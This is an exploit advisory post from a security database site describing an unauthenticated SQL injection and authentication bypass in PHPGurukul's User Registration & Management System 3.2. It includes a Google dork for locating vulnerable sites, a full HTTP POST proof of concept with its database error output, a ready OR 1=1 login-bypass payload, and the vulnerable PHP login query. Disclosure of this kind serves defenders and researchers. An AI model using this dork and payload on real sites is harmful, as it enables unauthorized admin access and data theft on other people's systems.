User Registration & Management System - SQLi [fixed typo]

2024.06.22
Credit: bRpsd
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ .:. Exploit Title > User Registration & Management System - SQLi .:. Google Dorks .:. inurl:loginsystem/index.php .:. Date: June 18, 2024 .:. Exploit Author: bRpsd .:. Contact: cy[at]live.no .:. Vendor -> https://phpgurukul.com/ .:. Product -> https://phpgurukul.com/?sdm_process_download=1&download_id=7003 .:. Product Version -> Version 3.2 .:. DBMS -> MySQL .:. Tested on > macOS [*nix Darwin Kernel], on local xampp @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ ############# |DESCRIPTION| ############# "User Management System is a web based technology which manages user database and provides rights to update the their details In this web application user must be registered. This web application provides a way to effectively control record & track the user details who himself/herself registered with us." =========================================================================================== Vulnerability 1: Unauthenticated SQL Injection & Authentication bypass Types: error-based File: localhost/admin/index.php Vul Parameter: USERNAME [POST] POST PoC #1: http://tom:8080/loginsystem/admin/index.php Host: tom User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://tom Connection: keep-alive Referer: http://tom/loginsystem/admin/index.php Cookie: PHPSESSID=fca5cef217b48f9ec0221b75695e4f2a Upgrade-Insecure-Requests: 1 username='&password=test&login= Response: Warning: mysqli_fetch_array() expects parameter 1 to be mysqli_result, bool given in /Applications/XAMPP/xamppfiles/htdocs/loginsystem/admin/index.php on line 9 =========================================================================================== Test #2 => Payload to skip authentication http://localhost:9000/loginsystem/admin/index.php username=A' OR 1=1#&password=1&login= Response: 302 redirect to dashboard.php =========================================================================================== Vuln File:/loginsystem/admin/index.php Vul Code: <?php session_start(); include_once('../includes/config.php'); // Code for login if(isset($_POST['login'])) { $adminusername=$_POST['username']; $pass=md5($_POST['password']); $ret=mysqli_query($con,"SELECT * FROM admin WHERE username='$adminusername' and password='$pass'"); $num=mysqli_fetch_array($ret); if($num>0)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top